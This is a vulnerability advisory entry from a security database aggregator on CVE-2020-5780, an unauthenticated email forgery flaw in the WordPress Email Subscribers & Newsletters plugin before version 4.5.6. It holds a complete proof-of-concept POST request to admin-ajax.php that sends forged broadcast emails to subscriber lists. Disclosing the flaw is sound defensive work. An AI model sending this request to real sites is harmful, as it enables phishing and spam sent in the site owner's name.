Lucene search
WpvulndbWPEX-ID:CF3F71C2-6DE2-4C8C-B7C4-29A63971777DHistorySep 10, 2020 - 12:00 a.m.
Email Subscribers & Newsletters < 4.5.6 - Unauthenticated email forgery/spoofing
2020-09-1000:00:00
wpvulndb
15
0.003 Low
EPSS
Percentile
69.1%
It allows a remote unauthenticated attacker to send forged emails to all recipients from the available lists of contacts or subscribers, with complete control over the content and subject of the email.
POST /wp-admin/admin-ajax.php HTTP/1.1
Host: example.com
Content-Type: application/x-www-form-urlencoded; charset=UTF-8
Content-Length: 222
action=admin_init&broadcast_data[id]=999&ig_es_broadcast_submitted=submitted&broadcast_data[subject]=test999&broadcast_data[body]=body-content&broadcast_data[list_ids]=2&broadcast_data[meta][scheduling_option]=schedule_nowRelated
openvas
openvas
WordPress Email Subscribers Plugin < 4.5.6 Email Forgery Vulnerability
2020-09-14 00:00:00
cvelist
cvelist
CVE-2020-5780
2020-09-10 14:10:03
threatpost
threatpost
WordPress Plugin Flaw Allows Attackers to Send Forged Emails
2020-09-11 16:34:02
wpvulndb
wpvulndb
nvd
nvd
CVE-2020-5780
2020-09-10 15:15:32
cve
cve
CVE-2020-5780
2020-09-10 15:15:32
prion
prion
Design/Logic Flaw
2020-09-10 15:15:00
nessus
nessus